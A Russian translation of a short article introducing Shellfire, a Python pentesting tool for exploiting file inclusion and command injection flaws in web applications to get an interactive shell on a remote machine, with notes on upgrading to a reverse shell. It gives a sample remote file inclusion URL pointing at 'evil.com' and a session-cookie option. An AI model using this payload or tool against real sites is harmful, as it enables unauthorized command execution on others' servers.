Shellfire — использование уязвимостей встраиваемых файлов и командных инъекций

Shellfire - использование уязвимостей встраиваемых файлов и командных инъекций

Использование уязвимостей встраиваемых файлов и командных инъекций: Shellfire

Shellfire – утилита, созданная для пентестеров и исследователей безопасности. Она может использоваться для повышения уязвимости веб-приложений с целью получения доступа к командной оболочке на удаленном компьютере.

Скачать Shellfire

Цель этой утилиты — представить чистую интерактивную псевдо-оболочку, которая будет выполнять команды на удаленной цели. Написанная и протестированная с помощью Python 2.7, эта утилита обеспечивает поддержку истории команд, SSL, нескольких методов протокола HTTP, базовой авторизации HTTP, встроенного веб-сервера для размещения кода эксплойта (который может использоваться с RFI), механизмов, помогающих в обновлении вашего соединения на истинную обратную оболочку на машинах Linux и многое другое.

Для использования shellfire, просто запустите его через python (или можно добавить разрешения на выполнение и запустить его напрямую). Например:

$ python shellfire.py
[*] ShellFire v0.1
[*] Type '.help' to see available commands
>>

Вы можете ввести .help  в любое время для перечисления всех доступных команд, или просто добавить название команды, о которой вы хотите получить дополнительную информацию или узнать какие-либо конкретные детали. Например .help http

Краткое введение в эту утилиту можно найти здесь:

Shellfire - использование уязвимостей встраиваемых файлов и командных инъекций

Чтобы начать работу, вам нужно указать, по крайней мере, URL вашей цели. Это должно выглядеть примерно следующим образом:

>> .url http://example.com/?path=http://evil.com/script.php

На данный момент у вас есть все для использования простых уязвимостей. Вы можете просто начать выполнять команды, и они будут отправлены прямо к цели. Для использования более сложных уязвимостей, вам может понадобиться указать дополнительные опции. Для примера давайте предположим, что вам необходимо отправить cookie с идентификатором сессии, чтобы использовать вашу цель. Вы можете добавить что-то вроде этого:

>> .cookies { "session_id" : "123456789" }

Дополнительные опции и информация о том, как их использовать может быть получена с помощью использования опции .help   в оболочке. Код свободно доступен на github под лицензией BSD.

Перевод: Анна Давыдова
Источник: n0where.net

Это интересно:

Оставьте комментарий